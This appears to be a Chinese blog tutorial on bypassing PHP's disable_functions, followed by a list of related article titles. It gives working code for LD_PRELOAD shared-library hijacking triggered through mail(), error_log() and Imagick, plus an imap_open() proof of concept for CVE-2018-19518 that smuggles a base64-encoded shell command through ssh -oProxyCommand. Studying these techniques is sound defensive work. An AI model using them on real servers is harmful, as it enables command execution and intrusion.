disable_function绕过--利用LD_PRELOAD
0x00 前言
有时候直接执行命令的函数被ban了,那么有几种思路可以bypass
1.使用php本身自带的能够调用外部程序的函数
2.使用第三方插件入(如imagick)
但是这两种无非就是利用php去调用外部的软件,再利用外面的软件执行shell
0x01 LD_PRELOAD
每个程序执行的时候会去动态链接库so
文件里面找函数的位置,而我们的目的是让程序去执行我们自定义的动态链接库
LD_PRELOAD
这个全局变量指定的so
文件会在每个程序本身的so文件之前加载
export #查看当前有的全局变量
export LD_PRELOAD=./test.so #将当前目录下的test.so文件加载到每个程序的动态链接库最前面
一个程序执行了哪些函数,可以使用
readelf -s /usr/bin/id
readelf -s /usr/sbin/sendmail
比如id中使用了getuid
20: 0000000000000000 0 FUNC GLOBAL DEFAULT UND getuid@GLIBC_2.2.5 (2)
那么编写个so
文件
test2.c
#include <stdlib.h>
#include <stdio.h>
int getuid(){
if(getenv("LD_PRELOAD") == NULL){
return 0;
}
unsetenv("LD_PRELOAD");
system("echo 'hello' >hello.txt");
}
编译生成so
文件
gcc -c -fPIC test2.c -o test2
gcc --share test2 -o test2.so
设置环境变量
export LD_PRELOAD=./test2.so
在php中如果把so
文件传上去了后,可以利用putevn
函数来设置全局变量
0x02 php本身能够执行外部程序的函数
能够触发外部命令的函数有mail()
,error_log()
,这2个函数都是会调用sendmail
命令,这个sendmail
软件是linux下用来发送邮件的(如果没有可用使用apt-get install sendmail
安装)
<?php
putevn("LD_PRELOAD=./test2.so");
mail("","","","");
//error_log("err",1,"","");
?>
假设没有sendmail
,我新装的ubuntu
就没有默认安装,那么php还有个的函数是2018年底爆出的一个CVE漏洞CVE-2018-19518
的imap_open()
函数
我也不知道这是不是php的锅,这个函数它是用来发送邮件的,它使用的是rsh连接远程的shell,但是在ubuntu
和debain
下,它是使用的ssh
而ssh的-oProxyCommand
参数能够带命令的,比如
ssh -oProxyCommand="touch test.txt" 10.10.10.10
即使连接失败,本地也会创建个test.txt
文件
那么php中的写法
<?php
$exp = "echo test!test! > /tmp/test";
$base64_exp = base64_encode($exp);
$server = "x -oProxyCommand=echo\t${base64_exp}|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
?>
这里直借用参考文章的poc
了,因为我本地不知道是不是php是最新的原因,报错说找不到imap_open这个函数
0x03使用扩展插件
这里不得不提下ImageMagick
了,这个图片处理的插件历史版本有很多漏洞,也有getshell的漏洞,但是这里介绍的是通过它调用外部的软件ffmpeg
,也是通过so
文件来达到命令执行的,至于环境如何搭建可以上网查查
当ImageMagick
处理以下文件的时候会调用ffmpeg
(文件必须存在)
wmv,mov,m4v,m2v,mp4,mpg,mpeg,mkv,avi,3g2,3gp
查看了ffmpeg
的函数表,没有getuid,因为对C语言我又是个智障状态,所以也不知道其他函数什么返回值,什么参数,重写要注意些啥,这里就讲个能通用的办法
之前使用sendmail
的时候是找的其中的一个函数getuid
,因为软件执行的时候会去调用这个函数,那么我们目的是为了找到一个所有C程序都会去执行,并且都有的'函数'
,这个就是__attribute__((__constructor__))
这个函数会所有程序在启动main之前100%调用,因此so
文件的写法
test3.c
#include <stdlib.h>
#include <stdio.h>
__attribute__((__constructor__)) void angel(void){
unsetenv("LD_PRELOAD");
system("echo 'hello'");
}
在php中执行方法
<?php
$img = Imagick("1.mp4");
?>
0xff结语
本来0ctf之后就会研究这个问题的,不知道为什么拖到现在,也算是填了个坑
参考链接:
https://cloud.tencent.com/developer/article/1379245
disable_function绕过--利用LD_PRELOAD的更多相关文章
- 利用LD_PRELOAD hook代码
loader在进行动态链接的时候,会将有相同符号名的符号覆盖成LD_PRELOAD指定的so文件中的符号.换句话说,可以用我们自己的so库中的函数替换原来库里有的函数,从而达到hook的目的.这和Wi ...
- 利用LD_PRELOAD进行hook
原文地址:http://hbprotoss.github.io/posts/li-yong-ld_preloadjin-xing-hook.html 好久没玩hook这种猥琐的东西里,今天在Linux ...
- 刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)
目录 刷题记录:[SUCTF 2019]EasyWeb(EasyPHP) 一.涉及知识点 1.无数字字母shell 2.利用.htaccess上传文件 3.绕过open_basedir/disable ...
- Disable_functions绕过整合
转载 https://whoamianony.top/2021/03/13/Web安全/Bypass Disable_functions/ https://www.mi1k7ea.com/2019/0 ...
- 内存保护机制及绕过方法——利用未启用SafeSEH模块绕过SafeSEH
利用加载模块之外的地址绕过safeSEH 前言:文章涉及的概念在之前的文章中都有过详细的讲解 ⑴. 原理分析: 当程序加载进内存中后,处理PE文件(exe,dll),还有一些映射文件,safeSEH ...
- CTF练习三 —— 命令注入&命令执行绕过
这个题是第四届强网杯也就是2020.8.22号开始的那场一道简单的命令注入题,再这之前我并没有学习过命令注之类的知识,,,看到题之后先搜在学,,误打误撞解了出来,过段时间wp就会放出来,所以这里就不对 ...
- bypass disable_function总结学习
通常bypass的思路如下 1. 攻击后端组件,寻找存在命令注入的.web 应用常用的后端组件,如,ImageMagick 的魔图漏洞.bash 的破壳漏洞 2. 寻找未禁用的漏网函数,常见的执行命令 ...
- php bypass disable_function 命令执行 方法汇总简述
1.使用未被禁用的其他函数 exec,shell_exec,system,popen,proc_open,passthru (python_eval?perl_system ? weevely3 wi ...
- SSRF绕过姿势
0x00 什么是SSRF? SSRF(Server-Side Request Forgery,服务器端请求伪造):是一种由攻击者构造形成由服务器端发起请求的一个漏洞. SSRF 攻击的目标是从外网无法 ...
随机推荐
- Leetcode练习
1. 两数相加 给定一个整数数组 nums 和一个目标值 target,请你在该数组中找出和为目标值的那 两个 整数,并返回他们的数组下标. 你可以假设每种输入只会对应一个答案.但是,你不能重复利用这 ...
- 重新学习SpringMVC——补充
56. SpringMVC_源码解析57. SpringMVC_Spring整合SpringMVC_提出问题58. SpringMVC_Spring整合SpringMVC_解决方案59. Spring ...
- LG5357 「模板」AC自动机(二次加强版) AC自动机+fail树
问题描述 LG5357 题解 不是fail树的AC自动机复杂度是假的. 把AC自动机搞出来,建立Trie树,树上爆搜一遍就好了. \(\mathrm{Code}\) #include<bits/ ...
- Linux引导过程与服务控制
一:系统引导流程: 开机自检(BIOS)-->MBR引导-->GRUB菜单-->加载内核(kernel)-->init进程初始化 二:系统引导级别: 0 poweroff.t ...
- Codeforces Global Round 4 题解
技不如人,肝败吓疯…… 开场差点被 A 题意杀了,幸好仔细再仔细看,终于在第 7 分钟过掉了. 跟榜.wtf 怎么一群人跳题/倒序开题? 立刻紧张,把 BC 迅速切掉,翻到了 100+. 开 D.感觉 ...
- Web协议详解与抓包实战:HTTP1协议-如何管理跨代理服务器的长短连接?(4)
一.HTTP 连接的常见流程 二.从 TCP 编程上看 HTTP 请求处理 三.短连接与长连接 四.Connection 仅针对当前连接有效 五.代理服务器对长连接的支持 未设置代理服务器 设置代理 ...
- 浅析RPO漏洞攻击原理
RPO的全称为Relative Path Overwrite,也就是相对路径覆盖,利用客户端和服务端的差异,通过相对路径来引入我们想要的js或者css文件,从而实现某种攻击. 就目前来看此攻击方法依赖 ...
- [LeetCode] 925. Long Pressed Name 长按键入的名字
Your friend is typing his name into a keyboard. Sometimes, when typing a character c, the key might ...
- [LeetCode] 673. Number of Longest Increasing Subsequence 最长递增序列的个数
Given an unsorted array of integers, find the number of longest increasing subsequence. Example 1: I ...
- java导出标题多行且合并单元格的EXCEL
场景:项目中遇到有需要导出Excel的需求,并且是多行标题且有合并单元格的,参考网上的文章,加上自己的理解,封装成了可自由扩展的导出工具 先上效果,再贴代码: 调用工具类进行导出: public st ...